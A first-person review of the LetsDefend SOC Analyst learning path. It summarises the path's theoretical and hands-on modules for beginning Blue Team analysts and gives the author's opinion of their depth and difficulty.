Spending about a month on and off with LetsDefend SOC Analyst learning path, here’s my experience with it.
Having finished the LetsDefend’s SOC Analyst path, I have some thoughts on it. For me, it was the very first Blue Team learning path that I ever took and so far I think it has done a good job of introducing me to some of the very basic terms, concepts, and tools of this field. Thanks to it, I now feel comfortable diving into more advanced paths and concepts.
The path contains modules that I would primarily divide into two sections to explain simply. They’re listed below:
Theoretical section
The theoretical section as I call it, starts with talking about the roles and responsibilities of a SOC Analyst and the various tools he makes use of, introducing us to terms such as SIEM, SOAR, EDR, Log management, Threat Intelligence along with common mistakes that SOC Analysts make with other modules talking briefly about common security solutions used in corporate environments like Antiviruses, Intrusion Detection Systems, Intrusion Prevention Systems, Firewalls, Wireless Access Firewalls, Email Security Solutions.
This section also goes through frameworks like Cyber Kill Chain and MITRE ATT&CK framework going through different stages for each of these frameworks. Moving further, It contains higher-level decisions businesses could take to improve their security posture by introducing users to things like the 3-2-1 rule of backing up data, Risk Analysis, and Incident Response
Hands-on section
The hands-on section as I would call it, differs in learning approach from the theoretical section. While the first section talks more about concepts on paper, the hands-on part is as it sounds. It’s more practical with quizzes, exercises, and alerts that one could interact with. It includes various modules based on different exercises that first teach about a vulnerability, tool, or concept and then provide exercises to practice it further. I’m further dividing the hands-on section below for the sake of clarity between sub-topics:
Malware Analysis
The malware analysis section of the path kicks off by introducing what malware analysis is, discussing the two major types, their differences, their importance, and when to use what. Furthermore, It goes about teaching the basic usage of tools for both static and dynamic malware analysis, covering common techniques malware uses to obfuscate itself and its activities as well as popular tool usage like Strings, Binwalk, Xorsearch, and more
Web
The web portion has modules on various web attacks like SQL Injection, Cross-Site Scripting, IDOR, LFI/RFI, Open Redirection, Directory Traversal, XML, etc. All of these come with hands-on exercises in the form of log files that one has to answer to progress further
Malicious Document Analysis
This module goes through the process of recognizing malicious documents, using suites like oletools to extract information about the malware and further analyzing it to make sense of its functioningLess covered tools
There are two dedicated rooms for both – Virustotal and Splunk. The modules do a good job of introducing both tools but in my opinion, they lack the amount of content. I think tools like Splunk and Virustotal should have been explored more. The modules barely scratch the surface, especially for Splunk. Now, I don’t know if it was intentional or not but I felt a lack of quantity here.Home labs
After all of the above-discussed content, the path has two modules for setting up a lab environment – one for Malware Analysis and the other for a SOC setup at home. The first one walks us through the process of setting up a FlareVM environment using Mandiant’s script. The other module covers building a SOC Lab for practice including pfSense, Sysmon, Active Directory, and Crowdsec
Conclusion
For absolute beginners who just have a basic understanding of computers and no idea of Blue Team, this learning path is approachable which is its strength but sometimes that could be its weakness too because it doesn’t challenge a user that much. That’s the only thing that had me a little concerned, coupled with occasional grammar mistakes that left me somewhat confused.
With all that aside, I think, it is a good learning path to kick start your Blue Team learning journey and I think it can be the first foot in the door for many future SOC Analysts